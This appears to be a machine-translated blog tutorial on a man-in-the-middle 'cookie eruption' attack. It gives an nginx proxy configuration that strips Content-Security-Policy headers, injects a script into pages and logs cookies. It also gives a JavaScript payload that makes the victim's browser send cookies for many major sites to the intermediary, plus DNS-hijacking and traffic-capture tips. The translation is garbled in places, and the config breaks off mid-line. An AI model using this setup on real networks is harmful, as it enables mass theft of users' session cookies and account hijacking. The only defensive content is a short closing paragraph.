Mitm attack-Cookie Eruption

Mitm attack-Cookie Eruption
0x00 Preface

Share the man-in-the-middle attack posture and try again and again.

It was originally an old article, but it was too long-winded. I will repeat it in concise words today.

0x01 Principle

Traditional cookie sniffing only allows users to access websites actively. It cannot be accessed, and the efficiency is very low.

If the traffic is controllable, it is better to inject a script into the page accessed by the user. By using scripts, you can request any site:

1 new Image (). src = 'HTTP: // anyhost'

Because the request header carries a cookie, the cookie of any site can be spoofed to the traffic and sent to the intermediary.

0x02 outbreak

First, collect the domain names of all major websites, and then send them one by one:

1 2 3 4 5 var list = ['qq. com ', '2017. com ', 'weibo. com ',...]; for (var I of list) {new Image (). src = 'HTTP: // '+ I +'/_ cookies ';}

In this way, the cookies of various websites can be cracked.

The backend receives the/_ cookie request, records the cookie, and returns an empty content. Therefore, you can test a site with only a small amount of traffic.

0x03 Optimization

Because various sites are collected, a large number of domain name resolutions are required.

To make the brute-force cracking faster, you can hijack your DNS request and temporarily resolve it to your own IP address, so that domain name queries do not need to go through the Internet.

DNS <-----> User intermediary Internet <-----> HTTP

There is also a huge benefit: the entire system can be hijacked offline without relying on the Internet!

For example, if there is no Internet, you can launch a Wi-Fi attack.

0x04 demo

We use nginx to demonstrate:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 28 29 30 31 32 33 34 35 36 38 39 40 41 42 43 44 45 46 48 49 50 51 52 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 # nginx. conf http {resolver 114.114.114.114 ;... log_format record_cookie '$ time_iso8601 $ remote_addr $ http_host $ http_cookie'; # static resource server {listen 8080; server_name m. io; gzip on; # expires 1d; Root/path/to/;} # proxy service server {listen 8080 default_server; server_name _; gzip on; location/{# requests html resources, enter the hijacking process if ($ http_accept ~ "Text/html") {rewrite ^/_ html;} # other resources, normal proxy proxy_pass http: // $ http_host ;} # page Injection location =/_ html {internal; # The compressed content cannot be sub_filter. Extract proxy_set_header host $ http_host; proxy_pass http://127.0.0.1:50000 $ Request_uri; # Delete the CSP header to prevent being blocked. proxy_hide_header Content-Security-Policy; # inject the script sub_filter

In the/path/to directory, place the front-end Attack Script:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 // cookie. js (function (list) {if (self! = Top) return; list = list. split (''); for (var I = 0; I <list. length; I ++) {new Image (). src = 'HTTP: // '+ list [I] +'/_ cookies' ;}} (// target site list '2017. com qq.com weibo.com ')

Set the HTTP proxy of the browser to 127.0.0.1: 8080.

Open any HTTP page to expose various cookies of users:

There are many practical ways to control traffic. For example, ARP attacks, phishing WiFi, phishing agents, or hijacking of the Community PPPoE network.

0x05 prevention

In fact, it is similar to the JSONP privacy leak. Simply close the browser's "third-party cookie.

Third-party cookies are harmless and are the culprit of privacy leaks.